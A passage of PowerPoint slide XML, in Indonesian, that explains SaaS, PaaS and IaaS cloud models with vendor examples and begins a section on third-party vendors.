            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi-aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diuji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft Office 365 (microsoft.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-us/ microsoft-365/enterprise), Salesforce (salesforce.com), dan Google G Suite (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. google.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PaaS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SaaS dan IaaS. Solusi PaaS pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IaaS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web/database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Oracle dan MS SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PHP dan MySQL. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Oracle Database (oracle.com/database), Microsoft Azure SQL Database (azure.microsoft.com/services/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-database), dan Google App Engine (cloud.google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>appengine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SaaS, platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CRM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> e-commerce) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform, dan Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Anda buat di platform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IaaS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sarana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SAN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen-komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>butuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyewanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Amazon Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual Machines (azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.com/cloud), dan OpenStack (openstack.org).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketiga</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
